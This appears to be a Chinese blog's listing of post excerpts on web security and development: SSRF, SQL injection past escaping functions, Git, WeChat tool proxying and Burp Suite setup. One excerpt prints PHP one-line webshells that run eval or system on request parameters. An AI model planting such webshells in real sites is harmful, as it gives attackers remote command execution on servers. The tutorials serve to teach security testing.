摘要:
目录方式一 替换微信开发者工具的cookie方式二 给系统默认浏览器设置代理 做微信公众号开发或者测试的朋友一般都会下载官方的微信开发者工具,来帮助自己开发或者测试。 微信开发者工具下载地址:https://developers.weixin.qq.com/miniprogram/dev/devto 阅读全文
摘要:
目录基础背景知识分支Git的三个空间的认识信息、状态查询Git 全局设置常用命令免密登录SSH of Pulic Key Login Github Git就是一个文件管理工具,它可以保存文件的每一个历史记录,以便查看每一个历史节点的文件变动情况和把错误的的历史节点回滚。 Git在线教程: https 阅读全文
摘要:
什么是SSRF 一个对外的Web接口,改接口能让用户控制curl命令,去访问别的web服务。 简图如下 想象一下当用户请求的baidu.com/x.php?image=google.com/1.jpg 改成 baidu.com/x.php?image=private.com/php.info,是不是 阅读全文
摘要:
类似PHP语言的 mysql_real_escape_string() 的函数,在用来防范SQL注入的时候,可能会遇到int型注入成功的情况。 mysql_real_escape_string()用法 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊 阅读全文
摘要:
基础类 很容易被扫描、检测出来 <?php @eval($_GET['phpcode']);?> <?php @eval($_POST['phpcode']);?> <?php @system($_GET['cmd']);?> <?php @system($_POST['cmd']);?> <?ph 阅读全文
摘要:
目录下载证书mac OS导入证书Chrome设置代理Safari设置代理 下面的操作基于Mac OS Catalina(v10.15.3),抓包拦截工具基于Burp Suite v2.1.05。 下载证书 将Burp Suite 的证书下载到本地任意一个路径下。如果使用其它抓包工具,自行搜索一下。 阅读全文